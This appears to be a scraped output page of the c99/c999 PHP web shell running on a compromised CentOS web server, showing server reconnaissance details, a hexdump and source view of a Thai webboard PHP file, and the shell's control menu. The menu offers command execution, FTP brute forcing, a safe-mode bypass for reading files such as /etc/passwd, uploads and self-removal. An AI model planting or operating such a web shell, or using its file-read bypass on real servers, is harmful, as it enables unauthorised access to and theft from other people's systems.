!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/webboard/   drwxr-xr-x
Free 52.36 GB of 127.8 GB (40.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     nuser.php (697 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/manage_22222/webboard/nuser.php
Size 697 B
MD5 f7b08528073e568d1733a85b3904bfd6
Owner/Group root/root
Perms-rw-r--r--
Create time 06/07/2011 01:44:26
Access time 30/07/2024 18:30:52
MODIFY time 21/08/2009 09:46:55

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
3C 68 74 6D 6C 3E 0D 0A 3C 6C 69 6E 6B 20 72 65 6C 3D 22 73 74 79 6C 65
73 68 65 65 74 22 20 68 72 65 66 3D 22 73 74 79 6C 65 2E 63 73 73 22 20
74 79 70 65 3D 22 74 65 78 74 2F 63 73 73 22 3E 0D 0A 3C 62 6F 64 79 20
62 67 63 6F 6C 6F 72 3D 22 23 45 43 45 43 45 31 22 20 6C 65 66 74 6D 61
72 67 69 6E 3D 22 30 22 20 74 6F 70 6D 61 72 67 69 6E 3D 22 30 22 20 6D
61 72 67 69 6E 77 69 64 74 68 3D 22 30 22 20 6D 61 72 67 69 6E 68 65 69
67 68 74 3D 22 30 22 20 62 61 63 6B 67 72 6F 75 6E 64 3D 22 69 6D 61 67
65 73 2F 62 67 32 2E 67 69 66 22 3E 0D 0A 3C 2F 62 6F 64 79 3E 0D 0A 3C
3F 0D 0A 69 6E 63 6C 75 64 65 28 22 63 6F 6E 66 69 67 2E 69 6E 63 2E 70
68 70 22 29 3B 0D 0A 6D 79 73 71 6C 5F 63 6F 6E 6E 65 63 74 28 24 68 6F
73 74 2C 24 75 73 65 72 2C 24 70 61 73 73 77 64 29 3B 0D 0A 09 24 73 71
6C 20 3D 20 22 73 65 6C 65 63 74 20 55 73 65 72 20 66 72 6F 6D 20 77 65
62 62 6F 61 72 64 5F 6D 65 6D 62 65 72 20 6F 72 64 65 72 20 62 79 20 44
61 74 65 20 44 45 53 43 20 6C 69 6D 69 74 20 30 2C 33 22 3B 0D 0A 09 24
72 65 73 75 6C 74 20 3D 20 6D 79 73 71 6C 5F 64 62 5F 71 75 65 72 79 28
24 64 62 6E 61 6D 65 2C 24 73 71 6C 29 3B 0D 0A 09 24 4E 52 6F 77 20 3D
20 6D 79 73 71 6C 5F 6E 75 6D 5F 72 6F 77 73 28 24 72 65 73 75 6C 74 29
3B 0D 0A 09 0D 0A 69 66 20 28 24 4E 52 6F 77 3D 3D 30 29 20 7B 0D 0A 09
09 65 63 68 6F 20 27 3C 66 6F 6E 74 20 63 6F 6C 6F 72 3D 72 65 64 3E 27
2E 22 C2 D1 A7 E4 C1 E8 C1 D5 20 CA C1 D2 AA D4 A1 A4 C3 D1 BA 22 2E 27
3C 2F 66 6F 6E 74 3E 27 3B 0D 0A 09 7D 0D 0A 09 77 68 69 6C 65 28 20 24
61 72 72 20 3D 20 6D 79 73 71 6C 5F 66 65 74 63 68 5F 72 6F 77 28 20 24
72 65 73 75 6C 74 20 29 20 29 20 7B 0D 0A 09 2F 2F 24 55 73 65 72 20 3D
20 24 61 72 72 5B 22 75 73 65 72 22 5D 3B 0D 0A 09 0D 0A 65 63 68 6F 20
22 20 20 3C 61 20 68 72 65 66 3D 27 2E 2E 2F 77 65 62 62 6F 61 72 64 2F
70 72 6F 66 69 6C 65 2E 70 68 70 3F 4E 61 6D 65 3D 24 61 72 72 5B 30 5D
27 20 74 61 72 67 65 74 3D 5F 62 6C 61 6E 6B 3E 3C 66 6F 6E 74 20 63 6F
6C 6F 72 3D 72 65 64 3E 20 24 61 72 72 5B 30 5D 3C 2F 66 6F 6E 74 3E 3C
2F 61 3E 2C 22 3B 0D 0A 09 7D 0D 0A 09 3F 3E 0D 0A 09 3C 2F 68 74 6D 6C
3E 		<html>  <link rel="style
sheet" href="style.css" 
type="text/css">  <body 
bgcolor="#ECECE1" leftma
rgin="0" topmargin="0" m
arginwidth="0" marginhei
ght="0" background="imag
es/bg2.gif">  </body>  <
?  include("config.inc.p
hp");  mysql_connect($ho
st,$user,$passwd);   $sq
l = "select User from we
bboard_member order by D
ate DESC limit 0,3";   $
result = mysql_db_query(
$dbname,$sql);   $NRow =
 mysql_num_rows($result)
;     if ($NRow==0) {  
echo '<font color=red>'
."ยังไม่มี สมาชิกครับ".'
</font>';   }   while( $
arr = mysql_fetch_row( $
result ) ) {   //$User =
 $arr["user"];     echo 
"  <a href='../webboard/
profile.php?Name=$arr[0]
' target=_blank><font co
lor=red> $arr[0]</font><
/a>,";   }   ?>   </html
>

HEXDUMP: [Full] [Preview]
Base64: [Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0103 ]--